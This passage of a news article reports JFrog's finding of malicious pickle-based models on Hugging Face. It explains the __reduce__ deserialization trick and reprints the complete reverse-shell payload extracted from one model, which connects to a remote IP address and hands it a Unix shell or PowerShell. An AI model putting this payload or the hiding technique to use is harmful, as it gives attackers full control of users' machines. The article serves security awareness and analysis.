One model drew particular concern because it opened a reverse shell that gave a remote device on the Internet full control of the end user’s device. When JFrog researchers loaded the model into a lab machine, the submission indeed loaded a reverse shell but took no further action.

That, the IP address of the remote device, and the existence of identical shells connecting elsewhere raised the possibility that the submission was also the work of researchers. An exploit that opens a device to such tampering, however, is a major breach of researcher ethics and demonstrates that, just like code submitted to GitHub and other developer platforms, models available on AI sites can pose serious risks if not carefully vetted first.

“The model’s payload grants the attacker a shell on the compromised machine, enabling them to gain full control over victims’ machines through what is commonly referred to as a ‘backdoor,’” JFrog Senior Researcher David Cohen wrote. “This silent infiltration could potentially grant access to critical internal systems and pave the way for large-scale data breaches or even corporate espionage, impacting not just individual users but potentially entire organizations across the globe, all while leaving victims utterly unaware of their compromised state.”

A lab machine set up as a honeypot to observe what happened when the model was loaded.

JFrog

Secrets and other bait data the honeypot used to attract the threat actor.

JFrog

How baller423 did it

Like the other nine truly malicious models, the one discussed here used pickle, a format that has long been recognized as inherently risky. Pickle is commonly used in Python to convert objects and classes in human-readable code into a byte stream so that they can be saved to disk or shared over a network. This process, known as serialization, gives hackers the opportunity to sneak malicious code into the flow.

The model that spawned the reverse shell, submitted by a party with the username baller423, was able to evade Hugging Face’s malware scanner by using pickle’s “__reduce__” method to execute arbitrary code after loading the model file.
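
To see why that works, consider a benign, hypothetical sketch of the same mechanism (this is not the malicious file itself): any object can define __reduce__ to tell pickle which function to call, with which arguments, at deserialization time.

# Benign illustration of the pickle risk: __reduce__ lets a pickled object
# instruct the unpickler to call an arbitrary function when it is loaded.
import pickle

class RunsOnLoad:
    def __reduce__(self):
        # Here it merely prints, but an attacker can return os.system or any
        # other callable, like the reverse-shell payload shown further below.
        return (print, ("arbitrary code executed during unpickling",))

data = pickle.dumps(RunsOnLoad())
pickle.loads(data)  # simply loading the bytes runs the embedded call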

JFrog’s Cohen explained the process in much more technically detailed language:

In loading PyTorch models with transformers, a common approach involves utilizing the torch.load() function, which deserializes the model from a file. Particularly when dealing with PyTorch models trained with Hugging Face’s Transformers library, this method is often employed to load the model along with its architecture, weights, and any associated configurations. Transformers provide a comprehensive framework for natural language processing tasks, facilitating the creation and deployment of sophisticated models. In the context of the repository “baller423/goober2,” it appears that the malicious payload was injected into the PyTorch model file using the __reduce__ method of the pickle module. This method, as demonstrated in the provided reference, enables attackers to insert arbitrary Python code into the deserialization process, potentially leading to malicious behavior when the model is loaded.

Upon analysis of the PyTorch file using the fickling tool, we successfully extracted the following payload:

RHOST = "210.117.212.93"
RPORT = 4242

from sys import platform

if platform != 'win32':
    import threading
    import socket
    import pty
    import os

    def connect_and_spawn_shell():
        s = socket.socket()
        s.connect((RHOST, RPORT))
        [os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
        pty.spawn("/bin/sh")

    threading.Thread(target=connect_and_spawn_shell).start()
else:
    import os
    import socket
    import subprocess
    import threading
    import sys

    def send_to_process(s, p):
        while True:
            p.stdin.write(s.recv(1024).decode())
            p.stdin.flush()

    def receive_from_process(s, p):
        while True:
            s.send(p.stdout.read(1).encode())

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    while True:
        try:
            s.connect((RHOST, RPORT))
            break
        except:
            pass

    p = subprocess.Popen(["powershell.exe"],
                         stdout=subprocess.PIPE,
                         stderr=subprocess.STDOUT,
                         stdin=subprocess.PIPE,
                         shell=True,
                         text=True)

    threading.Thread(target=send_to_process, args=[s, p], daemon=True).start()
    threading.Thread(target=receive_from_process, args=[s, p], daemon=True).start()
    p.wait()

Hugging Face has since removed the model and the others flagged by JFrog.
